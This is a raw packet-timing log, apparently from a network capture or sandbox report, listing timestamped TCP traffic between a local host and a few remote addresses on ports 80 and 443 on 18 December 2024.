                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069310904 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069322109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069351912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.069988012 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070095062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070162058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.070998907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071012020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071031094 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071202040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071232080 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.071903944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072026968 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072082996 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072942019 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.072954893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073004961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073544025 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.073993921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074033022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074609041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074621916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.074671030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075376987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075388908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.075476885 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076266050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076416969 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.076452017 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077115059 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077127934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077159882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.077975035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078818083 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078829050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.078850985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079528093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079540014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.079565048 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080348015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080362082 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080387115 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080504894 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.080537081 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081317902 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081331968 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.081953049 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082139015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082149982 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082798004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.082942963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083501101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083678007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083713055 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083848953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.083916903 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.084566116 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085380077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085391998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085550070 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085896015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.085926056 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086287022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086736917 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.086771011 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217581987 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217617035 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217644930 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217652082 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217670918 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217694044 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.217711926 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218596935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218612909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218667030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218702078 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218738079 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218760967 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218772888 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218797922 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.218821049 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219245911 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219258070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219296932 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219862938 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.219875097 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.220383883 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.220520020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223243952 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223288059 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223321915 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223330975 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223361015 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.223376989 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.248353004 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.248382092 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255386114 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255490065 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255501032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255800962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255814075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.255862951 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256552935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256566048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.256594896 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257420063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257431030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.257471085 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258203030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258217096 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258253098 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.258948088 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259785891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259802103 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.259835005 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260660887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260673046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260729074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.260776997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261477947 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261595011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261635065 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262269020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262310982 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262447119 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263364077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263375998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263401985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264003038 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264830112 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264842033 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264873981 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264900923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264961004 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265827894 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265841007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265866041 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266917944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266931057 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266968966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267507076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267519951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267545938 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268359900 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268373013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268395901 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269040108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269079924 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269260883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269903898 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270736933 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270750046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270800114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270836115 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270920992 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271689892 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271728039 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271795988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272456884 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272511959 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272583008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273433924 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273447990 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273477077 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.274322987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.452445030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.452589989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453571081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453583956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453625917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454498053 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454511881 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454581022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454992056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455004930 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455041885 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455979109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455992937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.456036091 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457123041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457137108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457168102 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457614899 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457657099 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458199024 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458340883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458354950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458395004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459431887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459445953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459490061 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460135937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460149050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460194111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460832119 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460877895 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461317062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461961985 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461975098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462016106 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462979078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462990999 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463104963 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463603020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463956118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463963985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464359045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464401960 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464612961 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465122938 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465166092 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465183973 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466160059 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466851950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466865063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466906071 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466947079 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466996908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467658043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467701912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467945099 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468605995 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468619108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468657017 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469383955 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469397068 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469428062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470243931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470257998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470283031 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471326113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471339941 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471368074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471926928 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471940994 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471981049 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472610950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472851038 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472894907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473575115 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473617077 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473710060 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474598885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474612951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474652052 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475328922 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475342035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475364923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476248980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476262093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476377010 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477111101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477123976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477164030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477886915 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477899075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477926016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478717089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478729963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478754044 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479408026 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479456902 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479546070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.480459929 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.480473042 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.663878918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.664067030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.664123058 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.786207914 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.386837006 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.466562986 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.571446896 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.571470976 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572030067 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572045088 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572086096 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572101116 CET49791443192.168.2.6142.250.181.65
